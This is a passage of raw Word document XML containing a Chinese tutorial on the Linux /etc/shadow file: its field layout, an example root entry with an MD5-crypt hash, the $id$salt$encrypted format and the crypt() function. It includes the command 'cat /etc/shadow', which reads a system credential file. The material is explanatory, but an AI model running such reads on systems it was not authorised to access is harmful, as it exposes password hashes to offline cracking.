          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最前面定义一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char* hname,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/usr/local/lib64</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shadow </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的内容，限于篇幅，我们举例说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>root:$1$Bg1H/4mz$X89TqH7tpi9dX1B9j5YsF.:14838:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其格式为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密后的口令密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口令最后修改时间距原点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1970-1-1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的天数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口令最小修改间隔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止修改口令，如果时限未到，将恢复至旧口令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口令最大修改间隔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口令失效前的警告天数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户不活动天数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号失效天数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保留</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【注】：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件为可读文件，普通用户没有读写权限，超级用户拥有读写权限。如果密码字符串为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则表示系统用户不能被登入；如果字符串为！，则表示用户名被禁用；如果字符串为空，则表示没有密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清空一个用户的口令密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中密码字符串的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于示例的密码域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$1$Bg1H/4mz$X89TqH7tpi9dX1B9j5YsF.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我们参考了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准源文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>passwd.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在其中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pw_encrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中找到了加密方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们发现所谓的加密算法，其实就是用明文密码和一个叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的东西通过函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crypt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成加密。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而所谓的密码域密文也是由三部分组成的，即：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$id$salt$encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【注】：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行加密；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SHA256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行加密；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SHA512</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行加密。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据加密函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crypt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>讲解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">i. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#define _XOPEN_SOURCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ii. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数原型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char *crypt(const char *key, const char *salt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">iii. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数说明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crypt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>演算法将参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所指的字符串加以编码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串长度仅取前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字符，超过此长度的字符没有意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>义。参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为两个字符组成的字符串，由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a-z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A-Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0-9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’和’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’所组成，用来决定使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4096</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种不同内建表格的哪一种。函数执行成功后会返回指向编码过的字符串指针，参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所指向的字符串不会有所改动。编码过的字符串长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字符，前两个字符为参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">iv. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值：返回一个指向以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结尾的密码字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">v. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附加说明：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译时需要加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lcrypt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的由来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在我们的示例密码域中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bg1H/4mz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么它又是如何来的？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
